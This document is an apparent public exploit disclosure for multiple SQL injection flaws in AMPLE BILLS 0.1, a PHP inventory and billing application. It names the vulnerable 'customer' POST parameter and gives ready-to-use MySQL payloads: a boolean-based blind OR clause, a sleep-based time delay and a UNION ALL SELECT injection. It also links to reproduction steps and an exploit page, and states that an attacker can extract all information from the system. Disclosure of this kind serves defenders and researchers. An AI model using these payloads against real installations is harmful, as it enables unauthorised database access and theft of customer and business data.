## Title: AMPLE BILLS 0.1 Multiple-SQLi ## Author: nu11secur1ty ## Date: 04/13/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The customer parameter (#1*) appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the customer parameter. The application took 20017 milliseconds to respond to the request, compared with 4 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: customer=(-8147) UNION ALL SELECT CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html) ## Time spent: 01:15:00